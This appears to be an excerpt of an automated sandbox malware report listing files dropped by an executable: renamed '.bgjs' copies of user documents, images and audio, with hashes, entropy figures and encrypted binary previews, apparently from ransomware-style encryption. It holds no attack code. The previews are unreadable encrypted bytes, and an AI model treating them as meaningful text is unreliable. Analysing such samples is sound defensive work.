                                                                                                                                      SHA-256:92DD1DE14208C4AC0658BD331D57E67D24E1AF1BD955F6D2BD11E060BC0EC74B
                                                                                                                                      SHA-512:050057C8D20D881C7480F70E4909469CE36FFEF1A4ADB0CD26453272A0F490CE77B304328F219C61BA9740A898D8ACD2DAAEEEDA1686858CF14362B410A5AFCD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:DBIQSk...Bh........\a!!}...z.....Ma...6......|f.(B...f...Z..t>.2.99.=.q [y...]k...j.....+e+.B...6..WE..W@.1m...'p.K.a,.~...Z.)..zB.V.$..k.......k. .x.G.......Wnh."D..H..$...F.g(TFi^.\.\a.V.E..@..S#.w..7....0.q.3.R......].X=?.X..7.a.kQ.D....$.........&.....]R.y..c.8.8...I?.1.v....g.Ys....F...O..8U...!E..]>.D....o:.U....~2..(...U..<.8.v....T.R......D'....K..Vkv._....PI.R.f...moX.o|.oi...2.W..U.Oh.:.`[*...{....9...W_..Fg.[.D.D.....&b.{2D|...rr..Qz-...<..V.Qu._.r..8Q..!.....9c.m+.hGX..'$.8~Ak].9......r(......`3.x[..&..M.. .....`.,7....0...).x.W....."......"W[...r.2c..!...<1....T....P...}.......... ....T.Y{....Tj.s.2}k4...M.=.4L4.H.....O_u.y.....v.0..+......_\R.C......),.Vu8....1..E.q..m..2.....|........J.s.....[...Y....z...*.(..#w......L....^G.:C..X.Y.S.n|..%.EE...X.D.K..Q.p#XE9........Dk.2.-...!U.+o.$...........k.....)..O/.w.>.m....'&I...B.....[....H.f...!.Ea.;.R..+..kG..,.....\PF...hM..L&K....S.'.|a.(X%..mh:..4.!Xi.fY..$...qy..,c....

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\DRBXYKCKXO.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.868840557828832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4l7maQv9tymhOWkxDAOU48ycWZM3w5QS2Om6hhWhsiza8lbD:4liawtlOWk+Z48ycWZMA5Q70jCD
                                                                                                                                      MD5:3EAB6AFBD5EFC74E81C6A1DBFFE24E59
                                                                                                                                      SHA1:5AC6227B3ECCB31960543C362B875B065FB12AE6
                                                                                                                                      SHA-256:ED6DBACC6D66BD054859A01A1FC170C9ACB9F0C33019050FF112AF810FF1D8DC
                                                                                                                                      SHA-512:9D7DE2E76B6B38D212F9191CBED7085A7BCE2C5131A01E42EB36CD5260CD3B2951783C8A299933CF27171F907A2FC15A535487B36A8BEA5DF9B06B0A3877881D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:DRBXY(..)..d..M.IT.p.TK..-..g1........r9.T).z..~M....?.8'....H......[.Tp.1.}e.+....Hy....... .K..=....C.f.40.(......!................R......+.....u...]...V......`.A[[.\*...K.(P.....w.]).=.'.N..`....P......d|..Pl`.a..VF...%.~...9.........>....*..qK......GJ.Y...4.7.7.J..v....9n.h......N.L..qGk...j...".....|}..j...3.hh.uQS.......E........o....pB..(.........I.f.....^.w..4...... C...n.f\`D.:T..pB..(u8MV.{}.1...'.a...5.,QG.......n.ez.#s..*.\..9.C.......V/.qpA.g...P..'..fC........t..Z.Nn.ebG...3v .N/.......%...).ec..aK.2/.@'.E.......}..!&~.3.L.[l.5f..D.,..(NL.6i..5...$...V6H......%d....F..0...>...d...*$.....u.A.Y....0f.........$.no|.e.zr.j.i...7.^.K.....q*.......T.<..|..]..=..m..W.....m.f;...S1...[.8.q......u..|5;`.....s..b.JCx{.h.g.......t.@....N..... ..1..../....f|.....RR.&b....y..Q/...QKq...=r.....q&..g..!.GC..a.{<.&.,..&..Q...6#...@.....+..w....:......28.......F.s\=u.24W....$.....N.'p....C.!......c.....t....,.e..P..C......E.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\GLTYDMDUST.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.865931454853426
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:NoLvKp4HYdv5qSCaHlp7uF1Xy4nvWtioSg/CQjhApE9C/bD:No6SYdv9P7R4utLtApWCjD
                                                                                                                                      MD5:025BA5EEEFCA69553317695EB0613BA1
                                                                                                                                      SHA1:D233846E505C2E1578C95F5C4C72CF0168883B87
                                                                                                                                      SHA-256:A35B04792654ED5D63C95FFFAAB86BE526754E979A85BC65D22FDE598E5D576C
                                                                                                                                      SHA-512:C713ECC174D1915F3DF5BF2F8949ACD838AD877397ACAE391496B8AC268423E0F3BB1AD14D8E4EDBAA56A028331568D281BCFEB6D98B3B2D0EA50533221A78E2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD?...T:6..'..O/7l~..NG-..K(...w..*..kWZ.,'.P...V.9..Z=t.....`.m.`v..........[......`.v2@...I......>...x.H......(N..UPy.|NZM3.w^.o..9..-ss...0u.p}.d..9+.p.;S.v[..$2..)..K.W.n.4..kg.t.~T..$!.J....}..?Vo....|.....>*.>.te....(..U.._w..^Q.1.|.q..zh..de..........p<..T5q....'...Pf.t...uB..#...^....L.K..+.X8J7......R.9*..oF..\}.]}[KO..#.....<....`.G..7.C....~.DB.5...'....y..Uj.{\s..w.#.......h....<.Ni..-.x.,.I.\...(Tr..#.$...nM......&....V.....XE.*x.<.x.[[-....#.\.D..R....2.=..4....._%k..{....Mx.|..v......".<.....~..3..D....q/..)CJ].;.W}../v....&D....!=.[..Q.QPF.7.@.._...5.......vj........k.;......*..e..W+l......r..N..*4.Pn........'....R.%.T.a..D0qL...jD.x..W>?NV.j...G^K.W.......}...D...~.{*9+Y..%.r>L..-..e.~O..8..mj.~...0..<.......wu..L.....8.9.b1t.wY...::$(aL........9.......]:r.}Q ...B.,...R.Q.=.J.T ..O. ...y+.6....H.!#....u&U.b......l)..[.b.Om......2......\..M.L.5...C.{!...k...$..&....OI...;l6.AIY...XB...v_.V;.p&....%.SKbd....I..Xy*.S.7.>1

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\GLTYDMDUST.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.835342032410528
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:edMLGTSFLAVZnZl6/vm+MXdvAyhmTaQlpOWKz792/8jbD:edMCOArnUTMWqUcWw7d3D
                                                                                                                                      MD5:B20B9984C712FE59438A5935060C5FA6
                                                                                                                                      SHA1:F4B422AA8B66963BDCD9A7185CC5DF9AF51095D4
                                                                                                                                      SHA-256:461120722A199BFF54013A8C7B875BD138DC8B0E60158A724353D10966DB71DF
                                                                                                                                      SHA-512:E95CF2891D5AA940BDE4BD964C624F39F760AA8017B0CDBD41C12EADFC903A011BBAC94DC87FBF5B3B967FDF2D4D1F59900F4EFAF9814238A0177E2F7CFF9A45
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD.q.<.RP..N.Y.... ......".....zz.V..q".O...$...(U...)..U{.`fJK...$.r...*.O.f..o..t....xh.Lu.s..t.m...<APn..}m..0..36.....7.nWQ,...._B..[.H...u.C!e_._..~M...B.%..,....V.zxVk..NO,....q~.l.D2n.=.(..5.(..%a.....S_.).....n-@.i.w.b?(G.X8..I....v@.%.;...`....F.Spq$A1n...//1..|E.t.\.../..d.]..g....o..g..>.8...|u)..Xn.....c..? %0#QmH..1...*7X`./.$.*..... &.Q.D...7...q.u(.....2f.q .vT....ci........`....z}...@...u6..|..f...X.Ik..%.W....1..\U(....m_7".c...u.G.C.OF.......=."t..W5(..r...S.....qj....h.,...(H..v...O... ..N.K.5..C....!../i.9Z...F.U...kd.G&..Z3..92:...Y....._}<....U.._....&8....<W...*#.m{(.f(y..O6.}?S...l.W.f....c...J.0.H....~..G.f..9...u9:.....Yy."=... .......Cs..,.....Jd....q...Z0..V....f .F....S.{.w.[..z...U...].....R..._.5eLP*J.4.z.%.....,...+...X..OKF...W..`.oX..Cx.._Z....O.W.,k..;........=e&.....>9.E.+.e~C.]...+...:.2@....Cfw..V.T..s..-..do$.w..9;d.$.l<HR^........q..gP=.=3.;...`!.{}.?2...^j.b:.0...f*T..)v...Ks....' Y..q.p6.(.~b./(..

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\GYPUZXUUOF.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.843798005558956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uR98Xl5sTSV3R3xA7Qn2DsfQ3WL4nxsDdGtftbeK91/KEGiYI7fAcUnQHbGL/TPX:uR9kdasfiWu6GHyYNK7i90cUnSCfD
                                                                                                                                      MD5:B2FC646CEEFEA0048602105D0264EA32
                                                                                                                                      SHA1:96208F13D8E0F945CCF95E2D17E2E643597434C6
                                                                                                                                      SHA-256:874DA876F5F05F16892CB38F8A09B8405D880836E73AD1890FFEFE74352F382F
                                                                                                                                      SHA-512:0611F14D01FAD7FBB6786C051DCE71F2D5A2EC4C9469F520349B9036977C3931F143FA4631FC023B7C8F74CB8FDF987F315E56CD0224924FD38D047C21DD7137
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GYPUZ(...4v.W..o..Vc..4J..X.7....{.:.>J.2..".>..g['...l....7..=...]..#.'...U.1..`..H..:#7......ZZ...44..}..i"....e........:...sY..."N)..O?...K.Ss.....Y........F.95..Q[xb..m....KPQ........xN.s.1.(....8J.......^..&....V.....s.......,._.}."H5..`....*..A.....q+:P..;..v{..Uj......rk..H....}..f...:..6).z..<..O....>.U..D/.=$.i%./...?..p....(u5.e...".aV..Y5.}Y..6.......o.A}....s....].e.n..4....).8|r...CA...".....R..#.>...*MT_/....Z.:.Tw.(Gd....h".I2..yR(..=...A..."...h.#...z..w...8F...K'.<.[...r%m.n bN......P..........k..I.Xs.k.o...;..sEo..8l..d...G.a.AF}.{FhE...M.&!Wj..^N3.Kys..B...y~k......!.&..X.^...W.<P6.&y..9....N....q=.g1.P.O.....%..&.t....;.....k.............LqZ.'a...W.>....A.....K.....aN..{..HH.Y.r.!."J..7$../.....v....t.!h.. U7.....PL.!_..B...7W._>...L}.W.P..]......v!*..".J..t8T..2?...T...S.c/.8...dD..;M'...c.in?1..`I..v.k.1......`..k..N....q......d..Y.sc^o.p.*....Okd.....c.WwF.u..`.#-..(.D;b.`.M.[............S..R.V.oWL.x..v.O.h

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HMPPSXQPQV.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.833689838807588
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:hq/37TUB4U54sbqFQaKrQAM3jzjsgdDF7KBuS4IMejaqihWt1MbD:ho3cBR57bklKvoogdZ7KBuS4IBihWt1e
                                                                                                                                      MD5:DB1F68E6666F48285E359B3CBA410958
                                                                                                                                      SHA1:752B4B15346FB7F59AA0008DC23746AFE8148233
                                                                                                                                      SHA-256:29475B4C2425DDA3DEEAD8C4B7C6623996749D285B7D0AEA743B30F7830152D0
                                                                                                                                      SHA-512:0BE987B189B205EE21435B26083B15A35226DF96281AB7FE69F8B2412AD73A4BCB4721FA6D38968485C1DAA5BDA7C86BEDB99EDD350889CBD375B81939A7BB26
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPSre......L.........1....pz..o4....x..dOP:..p.v...oe.....h......|.^mT...i....h..S..w....'...+P...a...H.e.{p.K.t.=v;..J.m..O.l...FH..}...V.*....+3.N<w..MH.0...X.6\..|...R".<.m.$.B.X..p.V1...4...k.+FaK^....Uo.....:FG..~..k{..8......_.ph..uQ...u...w....JK...}..zT|Q...02.(....*..[...$...T(......W....u.vN....(.....T.._0..x.Y(8b...eO...i.u.rZ...\c..8.R.}d.........&W8S.|...C.y.[..W.K....X.........:q..Q$..*.k...o.<F............M.i..,.=.-P.1-........a..Jv4.p....l.i.Oe.p.|.\...T;.8..'*.+..u..v....~.q..<.......v}.V2.0B..s9.....m0m.....j.G.....3.......>.jm_...?...9..vI..h.3%..J..B.-Y.BBj.....Oa.N>.....d...t...+`.......4.......L*.(.~D.z'1....W..U.MH."8.F8...2F..H.....8[.+....j.D...s.m...d...1.H...e......@&...o..TO]jk..."....N..}.....tP........4..N..W*....}..A.q.?...w9..1.....h.....m9#....RxU.^...]n.y!.I..haM....A.kP.})...:.o....se........I.r...X...<..L.c0..}..'.5...%..Z&f.N.m.n.p`.@..P.I+kT4`}..M..mY^..$....3z.J@f|.[y....H...,@..E$..T...nEkH

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HYGZTMOBZN.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.864025517831445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FjfUIhKp/ARjexughpZ9sLiAIVVuyL4LSXlc6S4rCznm5cnCF/FXJBf7bD:qIhfjexXhpAmAGVZLgSXldLlFxPnD
                                                                                                                                      MD5:99BD7789045F653AD1DBFF91730FFC56
                                                                                                                                      SHA1:B4CE6BF35CF647008E082BF33C5663132AA569DD
                                                                                                                                      SHA-256:093B4554861EB3E5DEED8D2B30316A1A5561AB45D29BD0B3C3F5316B8F9961D9
                                                                                                                                      SHA-512:884EC09E4329E1F4CBA25032B4F06ABA1CF4C4CC269EF7B977DC412A65B0037190E4F1B8458CE09F0F2547990040601E04276670263D9687C012D34BCC7169F5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HYGZT....5..c.q..)........00.[S....{}q...r=......Vte..Lz..ATo....8.%.@...e...H............8.....>...b&h....[q.s.V..E....b.v...D.j'd.31.......or...@5_..F\1...'....t.7S2.!2..~rH..i...+D:u..q..k5.,..fzf.....R_...T.,............V..."...*.\........s.0..?...;O..#Kj@._..W9....=..=Y..3..x07.....!.X.t...mc.t..f.x...\[..h...~. ......%j....L.-S....g.Ezs&\..y...v.....=;...=....}>.F..Lt....]$....Az...........q....a...."....W..(.O...z3./a.t.|.(PWx*....4W.`L..^:...=..G.R..g..s..q5.W...4....P).V...u.k...........)..)...".j...Y.....+.8..H.GYT=):.....7.j0.]KF.!_G./...j.&..@N..;....h...7(H>`..[C.n..R.-.|.. "....U...M.e.k... .....[.....:.i.3f.......Z.9..p....)Jk. ..(%i.p........Z.b.....o.x..K..wU.z....Q.L.....\Q.[.S.....N;&.vD.':..I.8.....`.EmY.ng."..kCyj.2...V........l{Lo....38.i.uk.x......$:....f.x0...T. .a..a.Wl...q6.-.3Mm..X.Od.....\.z........TG.M.b.X].@...v..m-.Ku.-....qA.5.jR.. .5...=..O.l....c~w......ml5nn.8OE..u...)..B.`A;.ms..2..=....{.4...

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HYGZTMOBZN.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.877218910519629
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ArkBQ2FL2sEAPU/nFp2fQDuLZRHAaN1Pu4WU2fMxzsrJN/4OInKbD:Ar2BFCqUt6QIvJTu4hmUOIoD
                                                                                                                                      MD5:8D04F379D1DFADF5625F1818882A0F55
                                                                                                                                      SHA1:F5A981BC8CF5855F6E8D5A1F8361A6AA400FFE25
                                                                                                                                      SHA-256:06988B7832EE983DE0F6E0225DE7AD1344D8168159865857E2A6D554DFC1A9E0
                                                                                                                                      SHA-512:28912EB55FB8AA5C4698742ADACB00AA7083D7B3830FB7A162E7B11D7084C9BB6FDC41EE05C854D919809091C580E91733ADF0F2961D3211499B3B79E0CAFC53
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HYGZT{3.>..f.,v.tw.....9...Xh}... .j%_.'..v....K.]..l.<.j.....P....v.\.......kR...i.@..os.(.(@..'<6.h..s..../..G...\e4M.V........m.....B.Z.1.ACXGy+...E...c._.p;.K...I..y.. ..qm.....C.."..W.IjU.y....g*..c.....>4p..R>....V....k%........%.'P.Q.n..CBP).... .r^.{d....oM...`|.4'....<..".5...T.O<....@U.Z/!..b)...D..d.E.v)...kw......#U`=..\...S.,...J].#.....P..M...*H..+.S.fE."t..".x.9....4.~.n>.o.=.h.lS..=...T/|...o"m...aD.......3W...".._V p..M..6*..@.<.c|.......m.Q.Q......f...i7<.R..*......dG.K.t`.b..j.Q... ....k......6a.A.I.....yH..s.Q,Q........T.....g.g.a.........,........*S..J.....B.1B.g....Y..T;..F%.Gz._h....~r.~..KC_3..%n;/..<.B..:.T..zVX...L.q..j.....&.Z.K0.h|...b ...i0.-@]......4..K...,.....2..oa...'.P.a.........>.k..'.B.gO.B.X.<... #.E.........?2>...=..h...X...}D......T..l"F]...N.L.\...y..t.+....i..U.....H..........*...j...|'B.4p."....U...........J.%{5..z{.&.p.&...s..g..lG3^.?..EW......!..9.j..(S...o...Lce./DD.c.;..Z..P.-.g.....P...."..#

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KGUOGFAKSS.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8494043201751404
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rGkQ6AlG0KOdkie/gwUt1gWwdG1A5wFOMxsUA1YEcRzUqkyviUJ7pbD:rHQ6oGfOdkmwUt/gfxYLD
                                                                                                                                      MD5:14B4574E2AAC05F720D5036138B24367
                                                                                                                                      SHA1:EBEE1617103E516BB034D8F0CD51F81C3676BD11
                                                                                                                                      SHA-256:7A53F130D83DD8A613C81DD17AB6DD22E4A4DF08D54C1EF7B7DAE9C7C3871DE1
                                                                                                                                      SHA-512:8C62F35C2B49A52F6F276EC2BA8A501FCA018BE109CEB433DC2BA85A8F69C6751DEE7E0964A811DDD68EDCB32FDB99C0172B6A7C43DB04C040A1A99D38254247
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:KGUOGA..^'.;e.'c.ey.i..5.c@..|.*x.Y.o.6...P..V.;........Q....(...F..".>..rl..O.q..?.CoB".5..../......?.z.j..t..P..<.c|].2..k...J.,..f..j.....K..1..|?.i.g!&..(...+..V...>].@Q...2..a..fK..f........3c). .S.NJ.i.<`.h..........H.....NIl.uR.4h..a.4..fLa..(zr.#.%..n.M...o.9...l..8...9...+.....3.ou...B._L..M.b....bF.]x[..x.f.N....o...4L...,.d.......{.....]~...t.@q.L.eH..P'..<.r....Ot1...k.K.Y...O...h.i-.E..F......hB.....K....1s.j<......B..+.Q.........4......t....v.S.2....y..C..]..{M]w/.........!...!L..t.u\.K...v"y.r:L....Joz......k...@..%oGz.(......ex...s..X?z.._...t..dm.....[W.'....r..x..r....mW.. c..)r0......0...m.sT..kw.%..f51."...O...<..N..#...Us.x..B.o.9.d.]....|-@.).+3i.m.Bu}..U..;.6.xm..P...P...uz......xz+.I..f:..-?........m2.J....mN.#....;w...|.0.j&.].Ncy..#-.......... ../[........B.....#_@..U.U.{i.g.yx.v.....~@.g.c...M....ZP..o.^.b...T6.2;..tC...#.........O.e.....N...C........b...T.....G.......r0..WR...A....".3....D....[..o.QF.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\LFOPODGVOH.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.845356392034434
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:jcas4zFDQfdHIvjv2HkWyq5BuM/n9i1j4L/KbyZXSsylpva6syh5/bD:Qas4p0f9IbLJq5x9ihAK2XnKqQ5jD
                                                                                                                                      MD5:E62161E7F28E046890A6177DDE72FB8A
                                                                                                                                      SHA1:016237D79C7EAE1BE89720E2B7FF1BFAE01BDF3B
                                                                                                                                      SHA-256:C1DCC675DEC5D697E1EC9943008E2EECAE3B260F928D6FAA197197A0A0D42574
                                                                                                                                      SHA-512:1F4E9F54DEEE60FD4FB43C269431D142BFFE6009BB5EDA90158C397F14E51F144203E2F8EC01A9C799D2AD0AF5D31070928FFC6109D261E7F2BD7AFC5CF4A136
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPOC.-.rO...!.T..t...U..P0.r. h.0&.....x.....L|z..Uy.M[.Z..7V_..@o.p:Y+....*.wY...$.$..-....h.L.g.A.....%.9[6..9.E.A..O..h..a.n.... P.q=\.l.4..L(:...`b..sD%..........Q.sX......Hv.b....J.K44.I...P.r.!.m6....X..{.....=.FG..N..)......4..9....?......E...........u.+o....:.."M\....C........t.....9:.6.g7.....S*.........4. 2.R/.*[n.6............x.4..!{.. 5..6A.>.x.$*....+!..F.$.1&:D.X^...e....s.....)MR.r.6G.~.;......DK...._;9.F.~.i..p.$.H.....).....b+.m.IO...>..g@...*.l.\/..N...@.y...j...+.....|K<\.&...!..O..7....f@.K.w#.pr0f......:.H.UT.#.JY:.....T28...A=.[.K.u'.0....z...KB...,w..../. z..o-....)\I...v.w~,..38..L]f...1../...g..R.N`3.A7....(...^.Tru.... ...[f.+4......8.m*.......H.(..4#.....'xow.:......g6I.6c.....r.....>\.r..Pyo&.....<yz?.../.w.l> .._.%m4...A.Z~2E.F+M..7.5...-o|v..G..DO`..."rYx..k.:..@}.7x..3..o.qsv.N..w.>....T.H+S....0pf.2%I{.<z.60.t..b.e......r.....6.w..E8......j.ipH3.wk..V...q|.......M)..l.\.....O2!n...;7.......^*.z-pY..i.aY(A

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\LHEPQPGEWF.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848450270212996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:9qP9HmXr6/rKSHC42Cy5qTCVSccs9nt01V7ZSLvvDIQxTBT6bD:9qVm76/+D4Dy5qTCV/cs9nC1V7ZUvDdc
                                                                                                                                      MD5:096954B3AB0D80949E2771DAC0154822
                                                                                                                                      SHA1:F8C08ABA372222D23B090640A7061DDCB9859C78
                                                                                                                                      SHA-256:40B9EC0192447E51E9B4CCF6F0BDC6ECAAE0F24D7BE97D5C87F6B4B2A2331ED8
                                                                                                                                      SHA-512:1B5A5A1F373CE82CC20D38410A2DDE847B0CBA00DACF57D731651FC2AD41C85883398344E5EAF8D6A5AC7CE19B6ED0C6A91AEE864840BF3C9906DA63F2AF529B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LHEPQx6..'...z.!....E.b.9m....K.Y..+.;".-...#..z,....@.({....o..&..W$`...!.k/..`;.j'K!2...T......ur.......&.bk.*....W}.".. ..r ".Z.to.....w../.g.....m...k..Gg.(....K{h:.K.......vA2w..u.WIn|......J.{....y..zZ8Q'.....?{.i....W5..M.$e.`...p6..D!...|..M#,\w.d.t...?6.(..S.......z"_...?;=.....?.<..i...M..\UpZ..#.4....P........._......P..8^I..G.Z.....F./.....Q...HCx.X....<...j."s.E.:.5.K$.&....a..=.'o.L@!.oU?....a.G...4...........Z^..0....&#..2...o..7../.4A<.a...J6Jt.Z...6J..Q..f.Z.0......u._....ko6eJ..)...e.......?\....a.......T.N..0...q..,c.bW....s....S..O.tW......4T..r.\.B.B..<...e..$..6N.-".dS}...W.$.....6..mJ'..(.....w&....f.R......F.......)..P..Z..n.2...x.k...-C..3E....9..A........>+.....4./....}*e....Nh=7...d...V2*#..)F./...$o..).5....6.....|GN.2..X..MN../....@;...._.......gw......N.s.e+.w.8..E.....+.D-.{=..QT.Y...dV...9..s....wv..H...;....[.r.r.c.4...A6.U.4M2..<....D..v:......T.......b..0...~..>...w...l.C..o'l..vC?...R.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\LHEPQPGEWF.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.856708746110962
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:9LAx+37vH7too9FMQ9Za40eKsMWy+b61o0Y78LlK+OlMV5+qkIDbD:9LAxiTtoozMyZj0fN1onKKFKQqD
                                                                                                                                      MD5:95DFBB0D5F875A26B6C0106E7DC5443E
                                                                                                                                      SHA1:4D259102409BEF1E36752E9F28DE15F20517D5BF
                                                                                                                                      SHA-256:3203F8BB7BD7DA9DE5D04626FC811E1E9295C563FC19DB09295D492658C7CEF3
                                                                                                                                      SHA-512:576A7E1C7CAF9F79D3E303205C73C53C7944F7A14CA0AEF406E5783FACA56CCB71DC678D41150D36E9A0466C4F1872983872A7AEBBCB7B49F6BD4A87BB9ED7C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LHEPQ...>gz...i$......9e......N{...)|.O.*.d.8;L#....O..&.....C..........[.......(<......P..u3..*t....H....&T.|8lN2A..'_p..a..By.K^\.....jd..#./.).k...l.o.a.4.Y3..Y.YM3$.}d .....7.a........=..qH.......$.j~...*.B3..V..+..........4..t..0E..w..=....4._3f..a)J..'j.Y.{..x.........]S.M..;.x..9.. :..h..T.#mgr.QCp..9...O...o.^....f...8C...M...4..1G....AS@-jm..G.....Koj.S..m...]..C.\...#.6.G.G.f..W...k.....j....8...2....0.Y......j?....o.OP..RY!Rz.h..Yx...i...[...?.cb2.4.....Y...Y...%.]GxkS.....hQ..W.......z...........".r.C#j....S.F.}...I....1.T..CP.}..D..~..F...............p..$gu....r.c...fm.........Yp.V....srk...#...m!...5%.:..98.".....\...l....7...!..\;.U4.hz..+,w,0.y.....,9~......#.">..Gf.Wi..j`~..).8C.._...B.....U..8..............e...............*Zup\.....F_8AH....x.eD..[0...}.I.Dx.`z.ZIFf,./...d.RW..,9;.....z..Vhoo..z..y."].....&b.V.@.h..^^.. .]..k~+j.....S+......f....D..*..Z}........RG..|.y.....X.....H....J...7.lbq....Q..X..Y.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\LIJDSFKJZG.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.864315073170425
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:S4UQpL1QMhhipIxY/vW5lX2xHdyM65hb2JyGJpOiWqzwtrqpX0QGkRmdZvl8+vdx:tUQpLeMGaxY25h2Zd165IJcph+Z8bq+j
                                                                                                                                      MD5:D20BE54704D2FAA4D883E2D22921520C
                                                                                                                                      SHA1:1CDECFCDC3D8A4F5B63966BF2A6760A437354F61
                                                                                                                                      SHA-256:23587EA0A29C70F425C4EFDF8A776C8E710F894F4EBB31967E73E4B98B1518B1
                                                                                                                                      SHA-512:31125F5D011983B72CDFF73EE545365BF44F9EE4D3381F9CBB456528B2B26784BB1DE7FC536E3F3B530A27BE410FD789FC4E049F308DF5CBD35206A7614722A5
                                                                                                                                      Malicious:false
